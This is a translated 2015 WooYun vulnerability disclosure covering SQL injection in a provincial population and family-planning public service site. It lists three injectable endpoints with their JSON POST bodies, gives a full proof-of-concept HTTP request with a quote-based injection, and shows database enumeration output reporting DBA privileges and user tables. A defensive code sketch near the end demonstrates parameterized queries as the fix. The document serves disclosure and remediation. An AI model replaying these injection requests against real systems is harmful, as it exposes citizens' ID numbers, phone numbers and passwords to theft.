
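Vulnerability summary

Bug ID: wooyun-2015-0154310

Title: Multiple vulnerabilities in a provincial population and family planning online public service center site (large-scale sensitive information disclosure)

Vendor: cncert (National Internet Emergency Center)

Author: goubuli

Submitted: 2015-11-20 20:30

Fixed: 2016-01-11 15:34

Published: 2016-01-11 15:34

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organization (cncert, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]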



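Vulnerability details

Disclosure status:

2015-11-20: Details reported to the vendor; awaiting vendor action
2015-11-24: Vendor confirmed; details disclosed to the vendor only
2015-12-04: Details disclosed to core white hats and experts in related fields
2015-12-14: Details disclosed to regular white hats
2015-12-24: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public

Brief description:

RT (see title)

Detailed description:

Henan Province Population and Family Planning Online Public Service Center
Address: **.**.**.**:8111/ecgapout/


Registration page:

**.**.**.**:8111/ecgapout/regedit/logintermperson.jsp


Sensitive information including usernames, passwords, names, phone numbers, ID card numbers and e-mail addresses is exposed.

1119-2.png


Vulnerable endpoint 1: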

**.**.**.**:8111/ecgapout/command/ajax/common.AdministrativeDivsionQueryCommand
POST:{"params":{"javaClass":"org.loushang.next.data.ParameterSet","map":{"code":"410100000000"},"length":1}}


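The code parameter is injectable.

1119-SQL1.png

The error response returns the SQL statement directly, which also makes it clear that the back end is an Oracle database; later steps confirmed that this Oracle database holds a very large amount of data.

Vulnerable endpoint 2: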

**.**.**.**:8111/ecgapout//command/ajax/zzjshw.approval.yewu.yechuli/getcantname
POST:{"params":{"javaClass":"ParameterSet","map":{"cantid":"410100000000"},"length"


The code parameter is blind-injectable.

1119-SQL10.png


Vulnerable endpoint 3:

**.**.**.**:8111/ecgapout//command/ajax/com.ecgap.updateUsers.cmd.OutUsersQueryCommand
POST:{"params":{"javaClass":"org.loushang.next.data.ParameterSet","map":{"LOGINNAME@=":"testtest","start":0,"limit":10,"dir":"ASC"},"length":5}}


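The LOGINNAME@ parameter is blind-injectable.

1119-SQL20.png


The site probably has other vulnerabilities as well.

Proof of vulnerability:

Blind injection runs slowly, so the first endpoint is used for the demonstration.
Request submitted: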

POST /ecgapout/command/ajax/common.AdministrativeDivsionQueryCommand HTTP/1.1
Host: **.**.**.**:8111
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json; charset=UTF-8
Referer: http://**.**.**.**:8111/ecgapout/jsp/ecgap/common/administrativedivison_radio.jsp?cantCode=410000000000&cantName=%E6%B2%B3%E5%8D%97%E7%9C%81
Content-Length: 104
Cookie: JSESSIONID=F86E30FC5975577A136FC183217E3CED
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

{"params":{"javaClass":"org.loushang.next.data.ParameterSet","map":{"code":"410100000000'"},"length":1}}


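Run it through the tool:

1119-SQL2.png


Several injection types are reported; setting that aside for now, look at the database information:

1119-SQL3.png


DBA privileges and 22 databases; the privileges are fairly high and cross-schema access is possible...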

back-end DBMS: Oracle
current user: 'ECGAP_DBA'
current schema (equivalent to database on Oracle): 'ECGAP_DBA'
current user is DBA: True
available databases [22]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] ECGAP_DBA
[*] ECGAPOUT_DBA
[*] EXFSYS
[*] HR
[*] IX
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB


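Looking at the tables in the ECGAP_DBA database [astonishing: 667 tables, which explains why the blind injection mentioned above is so slow; no screenshot attached]:

1119-SQL4.png


The 667 tables: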



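However, this hole supports UNION-based and error-based injection, so it is still fairly fast; reviewers are advised to use the same approach when reproducing it.
Data volume:

1119-SQL5.png


Tens of millions of records. I looked for the tables related to users: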

WF_ASSIGNMENT_END
PUB_USER_ROLE
PUB_USER_POLICY
PUB_USERS
...


1119-SQL6.png


=================================================================
Bonus: some cross-schema information



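No database dumping or other dangerous operations were performed; this was only a friendly test~

Fix:

Filter input.

Copyright notice: when reposting, please credit the source goubuli@WooYun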
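
As an added example (not code from the report or from the affected application), this sketch makes the fix named in the report concrete for the first and third endpoints: a strict format check on `code`, an allowlist for filter keys such as `LOGINNAME@=`, bind variables for every value, and generic error responses so that SQL text is never returned to the client. It assumes the server derives its WHERE clause from the keys of the request map; the tables `demo_cant` and `demo_users`, their columns, the helper names and the SQLite stand-in for Oracle are all hypothetical.

```python
import json
import re
import sqlite3

# Hypothetical allowlist: each accepted filter key maps to a fixed column and
# operator, so no part of a request key or value is ever spliced into SQL text.
ALLOWED_FILTERS = {"LOGINNAME@=": ("LOGINNAME", "=")}
PAGING_KEYS = {"start", "limit", "dir"}
CANT_CODE = re.compile(r"[0-9]{12}")  # the codes shown on the page are 12 digits
MAX_LIMIT = 100


class BadRequest(ValueError):
    """Input failed validation; the caller answers with a generic 400."""


def parameter_set(mapping):
    """Build a request body shaped like the ones in the report (constructed)."""
    return json.dumps({"params": {"javaClass": "org.loushang.next.data.ParameterSet",
                                  "map": mapping}})


def parse_map(body):
    """Pull the 'map' object out of a ParameterSet-style JSON body."""
    try:
        mapping = json.loads(body)["params"]["map"]
    except (ValueError, KeyError, TypeError):
        raise BadRequest("malformed body")
    if not isinstance(mapping, dict):
        raise BadRequest("malformed body")
    return mapping


def division_query(m):
    """First endpoint: strict format check, then a bind variable."""
    code = m.get("code")
    if not isinstance(code, str) or not CANT_CODE.fullmatch(code):
        raise BadRequest("invalid code")
    return "SELECT CANT_CODE FROM demo_cant WHERE PARENT_CODE = ? ORDER BY CANT_CODE", [code]


def users_query(m):
    """Third endpoint: allowlisted keys, bound values, validated paging."""
    clauses, binds = [], []
    for key, value in m.items():
        if key in PAGING_KEYS:
            continue
        if key not in ALLOWED_FILTERS:
            raise BadRequest("unknown filter")
        if not isinstance(value, str) or len(value) > 64:
            raise BadRequest("invalid filter value")
        column, op = ALLOWED_FILTERS[key]
        clauses.append(f"{column} {op} ?")
        binds.append(value)
    direction = m.get("dir", "ASC")
    start, limit = m.get("start", 0), m.get("limit", 10)
    if direction not in ("ASC", "DESC"):
        raise BadRequest("invalid dir")
    if (type(start) is not int or type(limit) is not int
            or start < 0 or not 1 <= limit <= MAX_LIMIT):
        raise BadRequest("invalid paging")
    where = " AND ".join(clauses) or "1 = 1"
    # LIMIT/OFFSET is SQLite syntax; the Oracle form differs but binds the same way.
    sql = (f"SELECT LOGINNAME FROM demo_users WHERE {where} "
           f"ORDER BY LOGINNAME {direction} LIMIT ? OFFSET ?")
    return sql, binds + [limit, start]


QUERIES = {"division": division_query, "users": users_query}


def handle(conn, endpoint, body):
    """Return (status, rows); database errors never reach the response body."""
    try:
        sql, binds = QUERIES[endpoint](parse_map(body))
        return 200, conn.execute(sql, binds).fetchall()
    except BadRequest:
        return 400, []
    except sqlite3.Error:
        return 500, []  # log details server-side only


def demo_db():
    """In-memory SQLite stand-in for the Oracle back end, with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE demo_cant (CANT_CODE TEXT, PARENT_CODE TEXT);
        INSERT INTO demo_cant VALUES ('410101000000', '410100000000'), ('410102000000', '410100000000');
        CREATE TABLE demo_users (LOGINNAME TEXT);
        INSERT INTO demo_users VALUES ('testtest'), ('alice');
    """)
    return conn
```

Because the report found the application account holding DBA rights, running that account with only the privileges its own schema needs limits what any remaining injection point can reach.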


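Vendor response

Vendor response:

Severity: High

Vulnerability Rank: 12

Confirmed: 2015-11-24 18:49

Vendor reply:

CNVD confirmed and reproduced the vulnerability described, and has passed it via CNCERT to the Henan branch center, which will follow up and coordinate with the organization that operates the website to handle it.

Latest status:

None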

